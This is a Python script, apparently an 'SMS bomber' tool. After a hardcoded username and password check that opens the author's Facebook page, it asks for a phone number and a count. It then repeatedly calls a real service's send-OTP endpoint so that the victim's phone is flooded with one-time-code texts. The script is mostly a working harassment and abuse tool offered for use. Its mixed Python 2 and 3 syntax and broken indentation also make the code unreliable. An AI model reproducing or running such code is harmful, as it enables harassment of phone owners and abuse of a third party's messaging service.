import time
import os
import requests

# Regular Colors
black ="\033[0;30m"        # black 
red="\033[0;31m"          # Red
green="\033[0;32m"        # Green
yellow="\033[0;33m"       # Yellow
blue="\033[0;34m"         # Blue
purple="\033[0;35m"       # Purple
cyan="\033[0;36m"         # Cyan
white="\033[0;37m"        # White




time.sleep(0.5)
try:
    import mechanize
except ModuleNotFoundError:
    print '[!] Module >Mechanize< Not Found!\n    This module is only available in python 2.x :/\n    Please install mechanize (pip install mechanize) and run the program with python2'
    
    
    



print("""________________$$$$$\n ______________$$____$$\n ______________$$____$$\n ______________$$____$$\n ______________$$____$$\n ______________$$____$$\n __________$$$$$$____$$$$$$\n ________$$____$$____$$____$$$$\n ________$$____$$____$$____$$__$$\n $$$$$$__$$____$$____$$____$$____$$\n $$____$$$$________________$$____$$\n $$______$$______________________$$\n __$$____$$______________________$$\n ___$$$__$$______________________$$\n ____$$__________________________$$\n _____$$$________________________$$\n ______$$______________________$$$\n _______$$$____________________$$\n ________$$____________________$$\n _________$$$________________$$$\n __________$$________________$$\n __________$$$$$$$$$$$$$$$$$$$$""")
    
    CorrectUsername = "MDALAMIN"
CorrectPassword = "HAKERBOY"
loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;92m \x1b[1;93mTOOL USERNAME \x1b[1;96m>>>> ")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;92m \x1b[1;93mTOOL PASSWORD \x1b[1;96m>>>> ")
        if (password == CorrectPassword):
            print "Logged in successfully as ALAMIN KHAN" 
            loop = 'false'
            os.system('xdg-open https://www.facebook.com/mdalamin12345')
        else:
            print "Wrong Password"
            os.system('xdg-open https://www.facebook.com/mdalamin12345')
    else:
        print "Wrong Username"
        os.system('xdg-open https://www.facebook.com/mdalamin12345')
time.sleep(0.5)


print(red+"""                 
     /\   | |ALAMIN  /\   |\     /| | | | |  | |
    /  \  | |       /  \  | \   / | | | |  \ | |
   / /\ \ | |      / /\ \ | |\/ | | | | | | \  |
  / ____ \| |____ / /__\_\| |   | | | | | |\ \ |
 /_/    \_\______/_/    \_\_|   |_| | | | | \ \|""")

number=str(input(green+" Enter The Number : "))

amount=int(input(red+" Enter The Amount : "))

alamin="https://stage.bioscopelive.com/en/login/send-otp?phone=88"+number+"&operator=bd-otp"


for i in range(amount):
    requests.get(alamin)
    print(str(i+1)+"ALAMIN SMS Sent")

